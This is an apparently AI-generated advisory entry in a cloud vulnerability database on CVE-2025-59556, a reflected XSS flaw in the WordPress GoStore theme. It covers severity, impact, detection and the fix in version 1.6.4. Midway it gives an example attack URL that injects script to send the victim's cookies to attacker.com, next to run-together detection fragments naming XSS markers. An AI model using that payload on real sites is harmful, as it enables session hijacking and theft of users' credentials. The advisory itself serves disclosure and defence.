
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-59556 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WordPress GoStore theme by skygroup, classified under CWE-79. It affects all GoStore theme versions prior to 1.6.4 and was reported on September 15, 2025, by Tran Nguyen Bao Khanh of VCI - VNPT Cyber Immunity, with public disclosure on October 15, 2025. The CVE was published to NVD on November 6, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack).
The vulnerability is rooted in improper neutralization of user-supplied input during web page generation (CWE-79), allowing reflected XSS attacks. An unauthenticated attacker can craft a malicious URL containing injected script payloads that, when rendered by the GoStore theme, are reflected back to the victim's browser without adequate sanitization or encoding. Exploitation requires user interaction — specifically, a victim must click a crafted link or visit a malicious page — causing the injected script to execute in the context of the victim's browser session. No authentication is required on the attacker's side (Patchstack).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the browser of a victim who interacts with a crafted link, potentially leading to session hijacking, credential theft, malicious redirects, or defacement of the affected WordPress site. The vulnerability has a changed scope, meaning the impact can extend beyond the vulnerable component to affect other browser-accessible resources. Confidentiality, integrity, and availability are all assessed as low impact individually, but the combined effect and potential for mass-exploit campaigns targeting WordPress sites make this a meaningful risk (Patchstack).
No public proof-of-concept exploit code or confirmed in-the-wild exploitation has been reported for CVE-2025-59556 at this time. The EPSS score is approximately 0.029% (0.000290), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress sites regardless of their traffic or popularity (Patchstack).
https://victim-site.com/?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script>, onerror=, onload=) in query parameters; outbound requests from victim browsers to unknown external domains shortly after page load.<script>, javascript:, or encoded variants %3Cscript%3E); referrer headers pointing to suspicious external sources.The primary remediation is to update the GoStore WordPress theme to version 1.6.4 or later, which contains the fix for this vulnerability (Patchstack). As a temporary workaround for sites unable to update immediately, Patchstack has issued a virtual patching/mitigation rule available to Patchstack subscribers that blocks exploitation attempts. Site administrators should also implement a Web Application Firewall (WAF) with XSS filtering rules and ensure Content Security Policy (CSP) headers are configured to limit script execution sources.
Wordfence included this vulnerability in their weekly WordPress vulnerability report for the period of October 13–19, 2025, highlighting it as part of broader WordPress ecosystem security coverage (Wordfence). No significant independent researcher commentary or notable social media discussion has been identified beyond standard vulnerability database aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."